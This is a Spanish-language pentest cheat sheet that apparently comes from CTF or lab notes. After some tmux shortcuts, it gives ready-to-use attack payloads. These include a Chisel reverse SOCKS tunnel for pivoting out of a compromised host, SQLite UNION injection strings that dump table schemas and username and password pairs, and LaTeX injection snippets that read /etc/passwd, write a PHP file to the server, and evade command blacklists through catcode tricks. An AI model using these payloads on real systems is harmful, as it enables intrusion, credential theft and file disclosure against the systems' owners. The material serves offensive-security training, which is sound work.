Tmux
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
# Paneles
CTRL B + T --> hora actual
CTRL B + " --> panel horizontal"
CTRL B + % --> panel vertical
CTRL B + Q --> indices de paneles
CTRL B + [flechas] --> navegar entre paneles
CTRL B + O --> navegar entre paneles segun indice
CTRL B (mantener presionado) + [flechas] --> tamano de paneles
:rezise-pane -[UDLR] <numero_lineas> # (Up, Down, Left, Right)
# Ventanas
CTRL B + C --> Nueva Ventana
CTRL B + [indice ventana] --> Navegar entre ventanas
CTRL B + n --> Siguiente Ventana
CTRL B + p --> Anterior Ventana
CTRL B + f --> Buscar Ventanas
CTRL B + , --> Cambiar nombre a Ventana
# Sesiones
tmux ls (listar sesiones activas)
CTRL B + $ --> Cambiar nombre de sesion
CTRL B + d --> Detach sesion
CTRL B + ( o ) --> Attach sesion
CTRL B + s --> Listar sesiones
# Attach Session
tmux attach-session -t <nombre de la sesion>
# Eliminar sesion
tmux kill-session -t <nombre de la sesion>
# Crear sesion
tmux new -s "nombre sesion"
|
Chisel
1
2
3
4
5
6
7
8
9
10
|
# reverse proxy
# server - kali
./chisel server -p 7070 --reverse
# client - box
./chisel client 10.10.10.10:7070 R:socks
# proxychains conf
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
|
SQLite
1
2
3
4
5
6
7
8
9
10
11
|
# Listar tablas sqlite concatenando el nombre
" union select (SELECT group_concat(name) FROM sqlite_schema WHERE type="table" ORDER BY name),2,3,4--
# Listar columnas de tablas (muestra el query de creacion de la tabla)
" union select (SELECT sql FROM sqlite_master WHERE type!="meta" AND sql NOT NULL AND name ="users"),2,3,4--
# "id": "CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, password DATE, role TEXT)",
# dump data concatenando columnas
" union select (SELECT group_concat(username || "," || password) from users),2,3,4--
|
LaTex
Read Multiple Lines without Loop
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
\newread\f
\openin\f=/etc/passwd
\read\f to\l
\l
\read\f to\l
\l
[...]
\read\f to\l
\l
\read\f to\l
\l
|
1
2
3
4
5
6
7
8
9
10
|
\newcommand\io{\read\f to\l \l}
\newread\f
\openin\f=/etc/passwd
\io
\io
[ ... ]
\io
\io
|
Bypassing Blacklists - Catcode
De existir alguna restriccion en los comandos es posible realizar un bypass utilizando catcode. Catcode con codigo 0 nos permite reemplazar \ por x (puede ser cualquier otro caracter). Los comandos ya no se definen como \command si no xcommand.
1
2
|
\catcode`\x=0
xcommand
|
Write File
La sintaxis quedaria de la siguiente forma para la escritura de un archivo.
1
2
3
4
|
\newwrite\outfile
\openout\outfile=sckull.php
\write\outfile{<?php phpinfo();}
\closeout\outfile
|
Y asi con catcode.
1
2
3
4
5
|
\catcode`\x=0
xnewwritexoutfile
xopenoutxoutfile=sckull.php
xwritexoutfile{<?php phpinfo();}
xcloseoutxoutfile
|
Read and Write
\ es reemplazado por q, en este, estamos haciendo uso de \mbox el cual permite los caracteres especiales.
1
2
3
4
5
6
7
8
9
|
\catcode`\q=0
\newwrite\f
\newread\f
\openin\f=/etc/passwd
\read\f toql
\immediate\openout\f=passwd
\immediate\write\f{\mbox\l}
\immediate\closeout\f
|
El archivo seria creado en el output directory bajo el nombre sckull.tex.
1
2
3
4
5
6
7
8
|
\catcode`\q=0
qnewwriteqf
qnewreadqf
qopeninqf=/etc/passwd
qreadqf toql
qimmediateqopenoutqf=sckull
qimmediateqwriteqf{qmboxql}
qimmediateqcloseoutqf
|
